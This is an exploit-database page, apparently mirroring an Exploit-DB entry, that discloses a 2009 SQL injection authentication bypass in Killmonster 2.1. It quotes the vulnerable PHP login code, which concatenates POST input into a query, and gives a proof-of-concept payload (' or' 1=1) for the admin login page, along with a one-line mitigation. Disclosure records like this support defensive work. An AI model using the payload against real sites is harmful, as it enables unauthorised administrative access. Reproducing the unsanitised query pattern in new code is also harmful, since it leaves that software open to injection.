Killmonster - exploit.company

vendor:

Killmonster

by:

cr4wl3r

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Killmonster

Affected Version From: 2.1

Affected Version To: 2.1

Patch Exists: NO

Related CWE: N/A

CPE: a:ringsworld:killmonster

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Killmonster <= 2.1 (Auth Bypass) SQL Injection Vulnerability

Killmonster version 2.1 and below is vulnerable to an authentication bypass vulnerability due to improper sanitization of user-supplied input. An attacker can exploit this vulnerability by supplying a crafted username and password to the login page, bypassing authentication and gaining access to the application.

Mitigation:

Ensure that user-supplied input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

[+] Killmonster <= 2.1 (Auth Bypass) SQL Injection Vulnerability
[+] Discovered by cr4wl3r <cr4wl3r[!]linuxmail.org>
[+] Download : http://scripts.ringsworld.com/games-and-entertainment/km2/


[+] Vuln Code : 

[login.php]

<form method="POST" action="authenticate.php">
Type Username Here: <input type="text" name="isadmin" size="15"><br>
Type Password Here: <input type="password" name="password" size="15" mask="x"><br>
<input type="submit" value="submit" name="submit">

[authenticate.php]

    $isadmin=$_POST['isadmin'];
    $password=$_POST['password'];
    $password=md5($password);
    $query = "select * from km_admins where username='$isadmin' and password='$password'"; 
    $result = mysql_query($query) ;




[+] PoC : [Killmonster_path]/admin/login.php

username :  ' or' 1=1
password :  ' or' 1=1